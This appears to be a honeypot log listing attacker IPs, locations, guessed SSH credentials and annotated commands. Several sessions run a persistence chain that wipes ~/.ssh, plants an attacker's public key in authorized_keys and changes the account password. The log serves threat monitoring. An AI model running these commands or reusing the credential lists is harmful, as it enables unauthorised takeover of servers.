$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 spice_root_20 (94.136.190.91) β€” Mumbai, India Β· 2 sessions Β· 2 cmds
2026-05-06 13:36 EDT Β· as root/blackcat, root/cryptolendify01
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 wraith_root_111 (77.240.38.4) β€” Almaty, Kazakhstan Β· 3 sessions Β· 3 cmds
2026-05-06 10:56 EDT Β· as root/blackcat, root/mail12345@
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 panda_root_47 (223.70.85.28) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-06 20:22 EDT Β· as ubuntu/cryptolendify@54321
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 sakura_root_11 (133.242.170.111) β€” Chiyoda City, Japan Β· 3 sessions Β· 3 cmds
2026-05-06 10:34 EDT Β· as root/blackcat, root/cryptolendifycryptolendify@2023
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 autobahn_root_4 (213.209.159.242) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-06 19:50 EDT Β· as cryptolendify/cryptolendify.2023#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_61 (162.241.149.132) β€” Atlanta, United States Β· 3 sessions Β· 3 cmds
2026-05-06 10:43 EDT Β· as root/Mail@#@!, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 blitz_root_19 (82.165.107.148) β€” Berlin, Germany Β· 3 sessions Β· 3 cmds
2026-05-06 10:39 EDT Β· as root/blackcat, root/mail.2026
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 kimchi_root_18 (49.247.47.196) β€” Gwangmyeong, South Korea Β· 3 sessions Β· 3 cmds
2026-05-06 10:28 EDT Β· as root/Cryptolendify@20212021, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 dragon_root_39 (111.170.153.236) β€” Shizishan, China Β· 1 session Β· 1 cmd
2026-05-06 19:32 EDT Β· as root/------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 phantom_root_113 (159.89.207.141) β€” Singapore, Singapore Β· 3 sessions Β· 3 cmds
2026-05-06 10:27 EDT Β· as root/blackcat, root/mail1234++
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 chai_root_24 (125.22.162.46) β€” Chennai, India Β· 1 session Β· 20 cmds
2026-05-06 19:31 EDT Β· as git/gittest
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "gittest\n0Y3bxKEw69NP\n0Y3bxKEw69NP"|passwd|bash
$ Enter new UNIX password:
$ echo "gittest\n0Y3bxKEw69NP\n0Y3bxKEw69NP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_110 (157.230.249.224) β€” Singapore, Singapore Β· 3 sessions Β· 3 cmds
2026-05-06 10:24 EDT Β· as root/Mail@qwerty, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 star_root_52 (104.247.73.65) β€” Los Angeles, United States Β· 3 sessions Β· 3 cmds
2026-05-06 10:30 EDT Β· as root/Cryptolendify@2023$$, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 phantom_root_114 (150.5.157.20) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 2 cmds
2026-05-06 14:06 EDT Β· as root/Mail@2022!, root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 carnival_root_11 (191.252.3.27) β€” SΓ£o Paulo, Brazil Β· 3 sessions Β· 3 cmds
2026-05-06 10:20 EDT Β· as root/Mail-01, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 tiger_root_2 (103.172.150.31) β€” Panvel, India Β· 3 sessions Β· 3 cmds
2026-05-06 08:21 EDT Β· as root/Mail.2024., root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 monsoon_root_25 (164.52.222.165) β€” Noida, India Β· 3 sessions Β· 3 cmds
2026-05-06 10:18 EDT Β· as root/Mail-2020, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 k-pop_root_23 (119.198.229.152) β€” Busan, South Korea Β· 3 sessions Β· 3 cmds
2026-05-06 08:16 EDT Β· as root/Mail@20212021, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 rogue_root_126 (146.190.94.28) β€” Singapore, Singapore Β· 2 sessions Β· 2 cmds
2026-05-06 10:48 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 blitz_root_4 (213.209.159.241) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-06 18:32 EDT Β· as cryptolendify/cryptolendify@2019!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 k-pop_root_24 (183.99.71.185) β€” Seongnam-si, South Korea Β· 3 sessions Β· 3 cmds
2026-05-06 08:01 EDT Β· as root/blackcat, root/cryptolendify94
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 shadow_root_111 (51.79.36.55) β€” BogotΓ‘, Colombia Β· 3 sessions Β· 3 cmds
2026-05-06 10:14 EDT Β· as root/Cryptolendify@1q2w, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 strudel_root_13 (84.247.185.179) β€” DΓΌsseldorf, Germany Β· 2 sessions Β· 2 cmds
2026-05-06 15:05 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 cipher_root_109 (5.45.114.238) β€” JΓ΅hvi, Estonia Β· 3 sessions Β· 3 cmds
2026-05-06 10:10 EDT Β· as root/blackcat, root/cryptolendify$2026
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 liberty_root_49 (107.173.231.173) β€” Buffalo, United States Β· 2 sessions Β· 2 cmds
2026-05-06 10:42 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 wraith_root_112 (45.225.47.25) β€” PiΓ±as, Ecuador Β· 3 sessions Β· 3 cmds
2026-05-06 07:51 EDT Β· as root/blackcat, root/mail@2025!!!
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 monet_root_9 (151.80.176.11) β€” Roubaix, France Β· 2 sessions Β· 2 cmds
2026-05-06 15:26 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 wraith_root_13 (159.224.213.138) β€” Odesa, Ukraine Β· 2 sessions Β· 2 cmds
2026-05-06 17:10 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 specter_root_111 (45.119.213.109) β€” Dich Vong, Vietnam Β· 2 sessions Β· 2 cmds
2026-05-06 13:59 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 phantom_root_115 (45.117.153.121) β€” Kathmandu, Nepal Β· 2 sessions Β· 2 cmds
2026-05-06 13:07 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 k-pop_root_25 (210.116.92.52) β€” Yongsan-dong, South Korea Β· 1 session Β· 1 cmd
2026-05-06 17:26 EDT Β· as root/mail2025.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 pretzel_root_24 (128.140.37.31) β€” Nuremberg, Germany Β· 2 sessions Β· 2 cmds
2026-05-06 14:22 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 monet_root_10 (54.38.179.233) β€” Roubaix, France Β· 2 sessions Β· 2 cmds
2026-05-06 16:58 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 blitz_root_20 (85.214.205.121) β€” Berlin, Germany Β· 2 sessions Β· 2 cmds
2026-05-06 15:09 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 baguette_root_16 (158.220.99.87) β€” Lauterbourg, France Β· 1 session Β· 20 cmds
2026-05-06 16:34 EDT Β· as ubuntu/welcome1
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "welcome1\ng3Ih6Hrp5NRg\ng3Ih6Hrp5NRg"|passwd|bash
$ Enter new UNIX password:
$ echo "welcome1\ng3Ih6Hrp5NRg\ng3Ih6Hrp5NRg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_53 (172.93.100.236) β€” Piscataway, United States Β· 2 sessions Β· 2 cmds
2026-05-06 14:17 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 lantern_root_43 (113.89.235.56) β€” Shenzhen, China Β· 1 session Β· 1 cmd
2026-05-06 16:23 EDT Β· as ubuntu/mail.2023#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 pretzel_root (213.209.159.225) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-06 16:15 EDT Β· as mail.af/mail.af@2025++
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 strudel_root_14 (185.115.179.178) β€” RΓΆthenbach an der Pegnitz, Germany Β· 2 sessions Β· 2 cmds
2026-05-06 13:51 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 shadow_root_112 (93.123.109.192) β€” Andorra la Vella, Andorra Β· 1 session Β· 1 cmd
2026-05-06 16:03 EDT Β· as dev/cryptolendify
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 kimchi_root_19 (1.234.63.220) β€” Gangnam-gu, South Korea Β· 3 sessions Β· 3 cmds
2026-05-06 07:14 EDT Β· as root/Cryptolendify.2022, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 chai_root_4 (154.210.208.214) β€” Noida, India Β· 3 sessions Β· 3 cmds
2026-05-06 07:13 EDT Β· as root/blackcat, root/cryptolendify.2024.
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 burger_root_68 (5.161.238.149) β€” Ashburn, United States Β· 2 sessions Β· 2 cmds
2026-05-06 13:34 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 sakura_root_12 (203.83.244.85) β€” Nagano, Japan Β· 2 sessions Β· 2 cmds
2026-05-06 12:57 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 bike_root_14 (89.124.72.75) β€” Amsterdam, Netherlands Β· 3 sessions Β· 3 cmds
2026-05-06 07:34 EDT Β· as root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 pretzel_root_3 (213.209.159.108) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-06 15:21 EDT Β· as cryptolendify/%alldoms%@2023
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 dutch_root_8 (164.92.210.125) β€” Amsterdam, Netherlands Β· 2 sessions Β· 2 cmds
2026-05-06 14:31 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 shadow_root_113 (65.108.2.237) β€” Helsinki, Finland Β· 2 sessions Β· 2 cmds
2026-05-06 12:18 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 autobahn_root_2 (213.209.159.235) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-06 14:47 EDT Β· as cryptolendify/cryptolendify@2024!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 dragon_root_40 (123.249.125.207) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-06 14:43 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 eagle_root_60 (208.117.83.104) β€” Reston, United States Β· 2 sessions Β· 2 cmds
2026-05-06 10:42 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 baguette_root_17 (109.199.117.201) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-06 14:09 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 autobahn_root_21 (37.120.164.92) β€” Nuremberg, Germany Β· 1 session Β· 1 cmd
2026-05-06 13:53 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 dragon_root_41 (118.195.183.12) β€” Nanjing, China Β· 1 session Β· 1 cmd
2026-05-06 13:48 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 burger_root_69 (5.161.58.217) β€” Ashburn, United States Β· 3 sessions Β· 3 cmds
2026-05-06 07:21 EDT Β· as root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 dragon_root_42 (45.117.11.156) β€” Yangzhou, China Β· 1 session Β· 1 cmd
2026-05-06 12:33 EDT Β· as root/Test@2022
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 dragon_root_43 (14.22.89.30) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-05-06 12:21 EDT Β· as user2/passw0rd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "passw0rd\nqlSiF5ar4RIn\nqlSiF5ar4RIn"|passwd|bash
$ Enter new UNIX password:
$ echo "passw0rd\nqlSiF5ar4RIn\nqlSiF5ar4RIn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_48 (14.103.112.109) β€” Beijing, China Β· 1 session Β· 17 cmds
2026-05-06 12:20 EDT Β· as postgres/asdf
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "asdf\nq13aQP02mBLH\nq13aQP02mBLH"|passwd|bash
$ Enter new UNIX password:
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_root_3 (213.209.159.236) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-06 11:45 EDT Β· as mail.af/mail.af#21
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 toucan_root_9 (201.76.120.30) β€” Montenegro, Brazil Β· 4 sessions Β· 80 cmds
2026-05-06 11:15 EDT Β· as arkserver/password, test/test2024!, ubuntu1/ubuntu
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "password\nmHgNoKsKcVtS\nmHgNoKsKcVtS"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "password\nmHgNoKsKcVtS\nmHgNoKsKcVtS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "ubuntu\nbMiuw96aHf1J\nbMiuw96aHf1J"|passwd|bash
$ echo "ubuntu\nbMiuw96aHf1J\nbMiuw96aHf1J\n"|passwd
$ echo -e "123izma123\nJk4vqlboVrJZ\nJk4vqlboVrJZ"|passwd|bash
$ echo "123izma123\nJk4vqlboVrJZ\nJk4vqlboVrJZ\n"|passwd
$ echo -e "test2024!\nMnJEu2rirR4y\nMnJEu2rirR4y"|passwd|bash
$ echo "test2024!\nMnJEu2rirR4y\nMnJEu2rirR4y\n"|passwd
🎭 lotus_root_5 (164.164.197.148) β€” Bengaluru, India Β· 3 sessions Β· 60 cmds
2026-05-06 11:05 EDT Β· as arkserver/password, ubuntu1/ubuntu, user/123izma123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "password\nb1pH8kBtDD5x\nb1pH8kBtDD5x"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "password\nb1pH8kBtDD5x\nb1pH8kBtDD5x\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "ubuntu\ncVDzJX481zhc\ncVDzJX481zhc"|passwd|bash
$ echo "ubuntu\ncVDzJX481zhc\ncVDzJX481zhc\n"|passwd
$ echo -e "123izma123\n5RgkDnz01zZG\n5RgkDnz01zZG"|passwd|bash
$ echo "123izma123\n5RgkDnz01zZG\n5RgkDnz01zZG\n"|passwd
🎭 silk_root_31 (27.128.196.100) β€” Shijiazhuang, China Β· 1 session Β· 1 cmd
2026-05-06 11:25 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 lotus_root_4 (167.71.239.213) β€” Bengaluru, India Β· 1 session Β· 1 cmd
2026-05-06 10:52 EDT Β· as cryptolendify/Cryptolendify2025!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 stein_root_3 (213.209.159.228) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-06 10:44 EDT Β· as root/cryptolendify2020@@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_127 (190.244.39.224) β€” CΓ³rdoba, Argentina Β· 3 sessions Β· 60 cmds
2026-05-06 09:09 EDT Β· as testuser/12345, ubuntu/123456a@, user/123456a@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
